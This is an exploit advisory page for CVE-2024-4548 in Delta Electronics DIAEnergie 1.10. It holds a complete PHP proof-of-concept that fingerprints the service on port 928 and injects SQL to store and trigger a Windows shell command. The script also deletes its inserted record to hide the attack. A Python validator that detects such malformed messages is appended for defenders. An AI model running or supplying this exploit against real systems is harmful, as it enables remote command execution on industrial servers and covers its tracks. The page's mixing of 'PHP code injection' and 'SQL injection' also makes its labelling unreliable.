DIAEnergie 1.10 SQL Injection

Published: 04 Mar 2025 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Views: 261

DIAEnergie 1.10 PHP Code Injection vulnerability allows SQL command injection on targeted servers.

Related

Reporter | Title | Published | Family
0day.today | DIAEnergie 1.10 SQL Injection Exploit | 22 Aug 2024 00:00 | zdt
Circl | CVE-2024-4548 | 21 Aug 2024 14:03 | circl
CNNVD | Delta Electronics DIAEnergie SQL injection vulnerability | 6 May 2024 00:00 | cnnvd
CNVD | Delta Electronics DIAEnergie SQL Injection Vulnerability (CNVD-2024-29663) | 10 May 2024 00:00 | cnvd
CVE | CVE-2024-4548 | 6 May 2024 13:51 | cve
Cvelist | CVE-2024-4548 Delta Electronics DIAEnergie SQL Injection | 6 May 2024 13:51 | cvelist
Metasploit | DIAEnergie SQL Injection (CVE-2024-4548) | 21 Aug 2024 18:52 | metasploit
NVD | CVE-2024-4548 | 6 May 2024 14:15 | nvd
Packet Storm | DIAEnergie 1.10 SQL Injection | 22 Aug 2024 00:00 | packetstorm
Positive Technologies | PT-2024-31657 · Delta Electronics · Diaenergie | 6 May 2024 00:00 | ptsecurity

=============================================================================================================================================
    | # Title     : DIAEnergie 1.10 PHP Code Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking In Google Or Other Search Engine.
    
    [+] Code Description:  The code attempts to establish a connection with the targeted server over the network.
    
        If the connection is successful, it sends a malicious SQL query to inject commands into the database.
    
        After injection, the script cleans the logs to ensure that the attack is not easily detected.
    	
    	( https://packetstorm.news/files/id/180334/  CVE-2024-4548 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 114
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    
    class CustomSQLInjection
    {
        const TARGET_PORT = 928;
        const TARGET_HOST = 'target_host'; // Set the target address here
    
        private $payload;
    
        public function __construct($cmd)
        {
            // Define the payload used to execute commands
            $this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
        }
    
        public function check()
        {
            try {
                $sock = $this->connect();
                fwrite($sock, 'Who is it?');
                $res = fread($sock, 1024);
    
                if (empty($res)) {
                    echo "Received an empty response.\n";
                    return 'Unknown';
                }
    
                echo "Who is it response: $res\n";
    
                preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);
    
                if (empty($version)) {
                    return 'Detected';
                }
    
                echo "Version retrieved: " . $version[0] . "\n";
    
                if (version_compare($version[0], '1.10.1.8610', '>')) {
                    return 'Safe';
                }
    
                return 'Appears';
    
            } catch (Exception $e) {
                echo "Error: " . $e->getMessage() . "\n";
                return 'Unknown';
            }
        }
    
        public function exploit()
        {
            // Inject the payload
            $this->execute_command($this->payload);
        }
    
        private function execute_command($cmd)
        {
            $scname = bin2hex(random_bytes(rand(5, 10)));
    
            echo "Using random script name: $scname\n";
    
            $random_date = date('Y-m-d', rand(2024, 2026)) . '-' . sprintf('%02d', rand(1, 12)) . '-' . sprintf('%02d', rand(1, 29));
            echo "Using random date: $random_date\n";
    
            $random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
            echo "Using random time: $random_time\n";
    
            try {
                echo "Sending SQL injection...\n";
    
                $sock = $this->connect();
                fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
                $res = fread($sock, 1024);
    
                if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Injection - Expected response received: $res\n";
    
                fclose($sock);
    
                // Trigger the script execution
                echo "Triggering script execution...\n";
                $sock = $this->connect();
                fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
                $res = fread($sock, 1024);
    
                if ($res !== 'Recalculate Script Start!') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Trigger - Expected response received: $res\n";
    
                fclose($sock);
    
                echo "Script successfully injected, check thy shell.\n";
    
            } catch (Exception $e) {
                echo "Error: " . $e->getMessage() . "\n";
                $this->cleanup($scname);
            }
        }
    
        private function cleanup($scname)
        {
            echo "Cleaning up database...\n";
            try {
                $sock = $this->connect();
                fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
                $res = fread($sock, 1024);
    
                if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                    throw new Exception("Unexpected reply from the server: $res");
                }
    
                echo "Cleanup - Expected response received: $res\n";
                fclose($sock);
    
            } catch (Exception $e) {
                echo "Error during cleanup: " . $e->getMessage() . "\n";
            }
        }
    
        private function connect()
        {
            // Connect using fsockopen
            $sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
            if (!$sock) {
                throw new Exception("Connection failed: $errstr ($errno)");
            }
            return $sock;
        }
    }
    
    // Specify the command to be executed
    $cmd = 'dir'; // Replace this command with the one you want to run
    $exploit = new CustomSQLInjection($cmd);
    $exploit->check();
    $exploit->exploit();
    
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
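
For defenders, the message layout visible in the PoC above can be turned into a strict validator for traffic to the service port, plus a version check that mirrors the PoC's `check()` threshold. This is an added example, not part of the original advisory or of the vendor's software; the four-field `command~start~end~integer` layout is an assumption inferred from the PoC's messages, and the helper names are hypothetical.

```python
import re
from datetime import datetime

# Last build the PoC's check() treats as affected (value taken from the page).
LAST_AFFECTED = (1, 10, 1, 8610)
# Command names seen in the PoC; the real service may accept others.
RECALC_COMMANDS = {"RecalculateHDMWYC", "RecalculateScript"}

def banner_is_affected(banner):
    """True/False from a 'Who is it?' reply, None when it carries no version."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\.(\d+)\b", banner)
    if not m:
        return None
    return tuple(int(p) for p in m.groups()) <= LAST_AFFECTED

def _is_timestamp(field):
    try:
        datetime.strptime(field, "%Y-%m-%d %H:%M:%S")
        return True
    except ValueError:
        return False

def inspect_message(msg):
    """Return findings for one client message; an empty list means well-formed."""
    parts = msg.split("~")
    if parts[0] not in RECALC_COMMANDS:
        return []  # not a recalculation request, out of scope here
    if len(parts) != 4:
        return [f"expected 4 '~'-separated fields, got {len(parts)}"]
    findings = []
    for label, field in (("start", parts[1]), ("end", parts[2])):
        if not _is_timestamp(field):
            findings.append(f"{label} field is not a timestamp")
    if not re.fullmatch(r"\d{1,9}", parts[3]):
        findings.append("last field is not a plain integer")
    return findings

# Constructed sample traffic, not captured from a real system.
SAMPLES = [
    "Who is it?",
    "RecalculateScript~2024-02-04 00:00:00~2024-02-05 00:00:00~1",
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);SELECT 1;--",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", inspect_message(sample) or "ok")
```

The PoC also expects the server to answer an injected request with `RecalculateHDMWYC Fail! The expression has too many closing parentheses.`, so that reply string in outbound traffic or service logs is a second indicator worth alerting on.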

Vulners AI Score: 10 (High risk)
CVSS 3.1: 9.8
EPSS: 0.48376